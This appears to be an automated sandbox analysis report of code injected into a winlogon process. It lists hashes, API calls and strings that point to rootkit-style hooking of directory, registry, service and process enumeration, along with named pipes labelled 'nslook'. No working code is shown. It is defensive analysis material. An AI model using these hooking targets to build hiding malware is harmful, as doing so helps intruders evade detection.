                            • Opcode ID: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction ID: 29ca8924484b3012b58c2a232780904c957ce46a14694de08bb14ef3dc513fb4
                            • Opcode Fuzzy Hash: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction Fuzzy Hash: 528100B270369087DB568FD1DC507EA77A5FB86B80F158239DE89473C4EA38D80AC701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Open$Close$Sleep
                            • String ID:
                            • API String ID: 3308825301-0
                            • Opcode ID: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction ID: 72449b2edef49a5f5eba09553d00170a91160030c7628b33c349c93c22a9b05e
                            • Opcode Fuzzy Hash: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction Fuzzy Hash: 3EE0927074760280FE93ABE6AC453FD16996B8A7CCF14003CA949877EAED28805F7203
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            [Control-flow graph for the function at 1afddd01f20 (basic blocks 1afddd01f20 to 1afddd02259, plus the tail block 1afddd06a30-1afddd06a3f that calls 1afddd06a40; Executed/Not Executed node list omitted). APIs called: GetCurrentThread, then GetModuleHandleA repeatedly, each call followed by a call to 1afddd14040 and conditionally 1afddd05fa0.]
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc$CurrentThread
                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                            • API String ID: 4239977575-1975688563
                            • Opcode ID: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction ID: 1a5438afa96fb31eb2c2d26e916ed9bb00d06edd36a7089945c407a5c1feeb2e
                            • Opcode Fuzzy Hash: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction Fuzzy Hash: BD91A0B5347B0291EE57DBD5EC543E42AA8BB8B749F84403D840A026E8EE38915EE213
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                            • String ID:
                            • API String ID: 1239891234-0
                            • Opcode ID: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction ID: 5ae404829e96b964d4d6b74cf890e1c381ddceb9440aade8a95e75f581d11291
                            • Opcode Fuzzy Hash: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction Fuzzy Hash: B9319F36316F8186DB61CFA5E8403EE37A4F789758F54012AEA8D43B98DF38C14ACB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite$Console
                            • String ID:
                            • API String ID: 786612050-0
                            • Opcode ID: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction ID: 661746793f4cd0b617fe7632d71190ed6a4bcbe8dfa628f154cda19715d2a625
                            • Opcode Fuzzy Hash: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction Fuzzy Hash: 3AD1D073706A819AEB02CBE5D4402ED7BB9F74678CF14422ADE8A47BD9DA34C01BC301
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            [Control-flow graph for the function at 1afddd029e0 (basic blocks 1afddd029e0 to 1afddd02fca; Executed/Not Executed node list omitted). APIs called: GetFileType, GetFinalPathNameByHandleW, lstrcpyW, lstrlenW, lstrcatW, lstrcmpW, lstrcmpiW, PathCombineW.]
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: lstrcmpi$Pathlstrcpy$Combinelstrcatlstrcmp$FileFinalHandleNameType_invalid_parameter_noinfolstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 4069998685-1812639415
                            • Opcode ID: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction ID: 1f806242f89e9e1f980be443ca6f6b4c2c0827ea550975b3dfb393bbedccd0b9
                            • Opcode Fuzzy Hash: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction Fuzzy Hash: 22F1817230368186EF268FE6D8407E97BA5F78AB89F444029DA4947BD8DF38C54ED701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph
                            [Graph for function starting at 1afddd033c0 not reproduced (executed/not-executed legend dropped); API calls visible in the graph nodes: GetModuleHandleA, OpenProcess, K32GetModuleFileNameExW, PathFindFileNameW, lstrlenW, CloseHandle, lstrcpyW, lstrcmpW, lstrcmpiW]
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: FileName$HandleModule$CloseFindOpenPathProcesslstrcmplstrcmpilstrcpylstrlen$AddressProc
                            • String ID: NtQueryObject$\Device\Nsi$nslook$ntdll.dll
                            • API String ID: 3769777229-563693742
                            • Opcode ID: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction ID: 77b2b06c29c6f4a16f3b8846f1ab743aed207b05d1d4a6ef3ad6c79be8ae19af
                            • Opcode Fuzzy Hash: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction Fuzzy Hash: D8F19C7670768182EE668FD6E4447E973A8F7CAB88F44403ADA49477C4DF38C84AD742
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph
                            [Graph for function starting at 1afddd02630 not reproduced (executed/not-executed legend dropped); API calls visible in the graph nodes: GetFileType, GetFinalPathNameByHandleW, lstrcpyW, lstrlenW, lstrcmpiW, lstrcatW, PathCombineW, lstrcmpW]
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: FileFinalHandleNamePathTypelstrcpylstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 2439355722-1812639415
                            • Opcode ID: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction ID: 875cf54bdec8b43193d1008bf06815df52a67b0cd42473c4cffd71f8ed247fcf
                            • Opcode Fuzzy Hash: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction Fuzzy Hash: DF91513630768181EF629FD1E4447EE6BA4F7C6B89F444029DA8943AD9DF38C54EDB02
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                            • String ID: \\.\pipe\nslookchildproc32$\\.\pipe\nslookchildproc64
                            • API String ID: 2171963597-3427204187
                            • Opcode ID: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction ID: 9f992d225a09bc82c20bc3a95380d94d57120195c82c119c5f604f447a4360d2
                            • Opcode Fuzzy Hash: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction Fuzzy Hash: 7631303630764185EA218BD6F45469A67A8F78AB99F4401399E5D03B98DF3CC54E8B01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction ID: 6a09d110d356032e916ea35ee3ac232cbdda02acbd041d88e2c77de9dd09a596
                            • Opcode Fuzzy Hash: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction Fuzzy Hash: 9181B23170364186FE56BBE6A4413F96A94B7C778CF68423D9948437D6DA38C84FA703
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph
                            [Graph for function starting at 1afddcd7aec not reproduced (executed/not-executed legend dropped); CRT startup routines visible in the graph nodes: __scrt_dllmain_crt_thread_attach, __scrt_dllmain_after_initialize_c]
                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508622976.000001AFDDCD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDCD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddcd0000_winlogon.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction ID: 1e762ff9b906580a599c249e70862c3eaa675176dbb0eda7254397c2f059be5a
                            • Opcode Fuzzy Hash: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction Fuzzy Hash: E681D17170368196FA63ABE99C413E962D0AB87780F08413D9ACA537D6DB39C84FC712
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: lstrcmplstrcmpi$_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 125796670-925916808
                            • Opcode ID: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction ID: 564dc93cba68000b14c5f33c08b8aff170c7fd74b0c9f4e9f289ec3b9c1b2c31
                            • Opcode Fuzzy Hash: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction Fuzzy Hash: DE81DB76303A4186EF668FE6D5443B92364F782B88F05423DCB0A47AD0DB35D41BE352
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: EnumInfoQueryValuelstrcmplstrcmpilstrcpylstrlen
                            • String ID: d
                            • API String ID: 760382566-2564639436
                            • Opcode ID: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction ID: 18ce0ad3eb8714951c01e411df11b3c20a28feb3eb85d7b88ac85e72812145ee
                            • Opcode Fuzzy Hash: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction Fuzzy Hash: 77516172306B8186EB55DB91F5403EE73A9F3C9B84F404029DB9947B98DF38D06ADB01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Current$ProcessProtectThreadVirtual$HandleModuleTerminate
                            • String ID:
                            • API String ID: 23076575-0
                            • Opcode ID: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction ID: 632377a80ea8a0f5ae15f645c7ca671053f411d7eb6597cec96c792c6921dcde
                            • Opcode Fuzzy Hash: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction Fuzzy Hash: 5E61F871327B4282EE52DBD5E8517E927A4FB86748F84103DE94D067E9EF28C00ED742
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Library$Load$AddressErrorFreeLastProc
                            • String ID: api-ms-
                            • API String ID: 2559590344-2084034818
                            • Opcode ID: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction ID: 567beaadd5fe4ad5575b2337ac8c29b93a43c4ddc9d957b24ee5bb696a616a7b
                            • Opcode Fuzzy Hash: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction Fuzzy Hash: B931C73235774195EE239BD2A800BF92398F796B68F49653DDD29077D5EF38C04A9302
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction ID: 064856c7aedb696d55f5fe50187f8b7233cfcad3f41a0e327785bf44722cf69b
                            • Opcode Fuzzy Hash: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction Fuzzy Hash: 7C31607230364186EE169BE6D5507F86B66F78AB8DF544039CE0A476D8DF34C54EE302
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction ID: bd352007f468cce5778ea594c8893fee73506a8693bb9914e72b408b6f6fb868
                            • Opcode Fuzzy Hash: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction Fuzzy Hash: 5131803A30768192EE669BE1E4547FD6761F786B89F444029CA0A036D8DF38D54EE702
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                            • String ID: CONOUT$
                            • API String ID: 3230265001-3130406586
                            • Opcode ID: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction ID: 33222000fccaacbce4f89624b909a2fb54468e58bb1b9d00d34356dfe69b2a33
                            • Opcode Fuzzy Hash: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction Fuzzy Hash: 75119333312B4286EB518BD2F84475966A8F389BE8F144238EA5D877E8CF38C54E8745
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: lstrcmpi
                            • String ID:
                            • API String ID: 1586166983-0
                            • Opcode ID: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction ID: d029227b87d97915c65a5c7e952fb2796850ae1ca214e6555b56cce8bc429d42
                            • Opcode Fuzzy Hash: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction Fuzzy Hash: 11C1533671360087EF62CFDAD0807B973A1F3D6B88F958029DA09837D8DB35D89A9751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction ID: d85413ce1d58126bfb42fe99aad1d5aa8599cec1380482a3386a027090e3cca6
                            • Opcode Fuzzy Hash: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction Fuzzy Hash: D9F0127231364282FF569FE1E4843E92368EB89759F44203DA90B4A5E5DF3CC58EC752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 2210144848-0
                            • Opcode ID: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction ID: fada62c1b21bbca1d988ad8866705df4913a3099c42c3af81d7504fbb9f6a211
                            • Opcode Fuzzy Hash: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction Fuzzy Hash: 8881AE33713A1289FF229BE5D8407ED6BA8F746B9CF444239DA0A536D5DA34844FC712
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: 0d64e0ab7572ed2ee22c40ee5596af816ffd64d1a05f57047e0db58f1c18debd
                            • Instruction ID: dde1c718bea41b3872b11c08cc23819d8f050d480778f959ce451347d46f2023
                            • Opcode Fuzzy Hash: 0d64e0ab7572ed2ee22c40ee5596af816ffd64d1a05f57047e0db58f1c18debd
                            • Instruction Fuzzy Hash: 7861DA3261BA80C7EB618B95E44176AB7A4F3C9748F500129FA8D43BE8DB7CC549DB02
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction ID: cc0e6aa70c64fa1fb9871bfe7337b17ff6d0d8017f9ace4946a188b2bf8f1e88
                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction Fuzzy Hash: 1C119433753A4301FF5611E8E8577E51849EB5737CF54063CAF66167EE8A26884B4207
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508622976.000001AFDDCD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDCD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddcd0000_winlogon.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction ID: 9a5005ca0149a622bcbfe9212328a717b23ebe418a7c218701e4ef018b6ada71
                            • Opcode Fuzzy Hash: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction Fuzzy Hash: 6411C1F2B57A4002F67A11E8D453BE5C0406B57370F08423CABE67B2D6CA2B8D8BD202
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508622976.000001AFDDCD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDCD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddcd0000_winlogon.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: Dec$January$Oct
                            • API String ID: 3215553584-2670745533
                            • Opcode ID: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction ID: 431692b53e5719ff494d713a10d9755451cd40553e64669349596e23b84580b4
                            • Opcode Fuzzy Hash: 5e3f35654ae946a199acd0dab1e3d24a2855035388db7b56c0256662182ab222
                            • Instruction Fuzzy Hash: 9C61A072B0374086FA679BD5AC503EA66A1E796784F10403DDACA13BD4FB38D84F8213
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508622976.000001AFDDCD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDCD0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddcd0000_winlogon.jbxd
                            Similarity
                            • API ID: _invalid_parameter_noinfo
                            • String ID: r-dialogbox-l1-1-0
                            • API String ID: 3215553584-4250323851
                            • Opcode ID: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction ID: 8a968e75e2652b45e476cb65f0b2fa9e83f6bd7acc6eda74565218df30689e38
                            • Opcode Fuzzy Hash: 0c2568eed714bf13032a55bd6b1163a073a3bffa3452c1d7e2ab8017899a9a63
                            • Instruction Fuzzy Hash: 9C41237670378081EB369BD19C403FA7AA0A347BA4F554239EAC9077D5CE38C58BC702
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: EnumInfoQueryValue
                            • String ID: d
                            • API String ID: 918324718-2564639436
                            • Opcode ID: 2b6f759017033bc42d1ee0350eeb4893f61cf903c5f23e249b9070065a49af58
                            • Instruction ID: 1a44b54b67769235c9634d2a71251d73bfbd3abcb78807a973e81b88e611af52
                            • Opcode Fuzzy Hash: 2b6f759017033bc42d1ee0350eeb4893f61cf903c5f23e249b9070065a49af58
                            • Instruction Fuzzy Hash: 0E41397230AB8096EB658B91F84039AB3A5F3CAB84F504529EB9943B58DF38D465DB01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite
                            • String ID: U
                            • API String ID: 442123175-4171548499
                            • Opcode ID: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction ID: f50353c2e63f78272b59be42bc0c6ce02e7e512a92cf7694df93f4e3d2eb207e
                            • Opcode Fuzzy Hash: bc4894b8380f827de51b153ff8dcd6fe6eccf43ce17c5514f992378ed3d9d4cf
                            • Instruction Fuzzy Hash: 7741D073316A4182EF219FA5E4443EAA7A8F399788F404139EE4D87788EB38C44AC741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Stringtry_get_function
                            • String ID: LCMapStringEx
                            • API String ID: 2588686239-3893581201
                            • Opcode ID: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction ID: 5b6939169f4ef5506958d9c10e691ff9f04027efa48362e0e0c3b077d0df604c
                            • Opcode Fuzzy Hash: 0650644c2c900b4814cbcd9bf92414a9b71a297e973e0b979cc5e0fd495833a0
                            • Instruction Fuzzy Hash: 93110B36709B8086DB65CB95B84029AB7A8F7C9B84F54412AEE8D83B99DF38C455CB01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            • Opcode ID: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction ID: ef7da00e5fdc505a53e48b1a5366db48bfbc70b2ceaa84c8faf4c4a601d51945
                            • Opcode Fuzzy Hash: 3bc9577514421139fbef7d5dc897fc9f2b2065d60f0eafa8fa7f61b963509bf2
                            • Instruction Fuzzy Hash: BB110D32216B4482EB118F95F44079977A5F789B98F584225EF8D077A8DF38C556CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
